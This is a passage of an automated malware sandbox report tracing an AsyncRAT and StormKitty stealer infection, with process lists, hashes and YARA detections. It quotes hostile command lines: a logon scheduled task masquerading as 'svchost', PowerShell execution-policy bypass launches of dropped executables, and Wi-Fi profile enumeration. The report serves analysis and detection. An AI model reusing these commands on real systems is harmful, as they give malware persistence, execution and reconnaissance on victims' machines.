                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                  Imagebase:0x940000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout 3
                                                                  Imagebase:0x290000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:05:19:01
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0xc40000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 87%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:05:19:02
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x5e0000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
                                                                  Imagebase:0x4b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\udwnme.exe"
                                                                  Imagebase:0xad0000
                                                                  File size:179'200 bytes
                                                                  MD5 hash:DA34EA26DDFEDFD7966E8AEDF0BB93E6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 79%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:16
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show profile
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr All
                                                                  Imagebase:0x560000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:05:19:37
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show networks mode=bssid
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                                                                  Imagebase:0x4b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:05:19:39
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\luglzv.exe"
                                                                  Imagebase:0x530000
                                                                  File size:179'200 bytes
                                                                  MD5 hash:FF895D93516828450E0C0DD0E467E1D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:29
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show profile
                                                                  Imagebase:0x7ff726ad0000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr All
                                                                  Imagebase:0x560000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show networks mode=bssid
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00FE0EB8 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
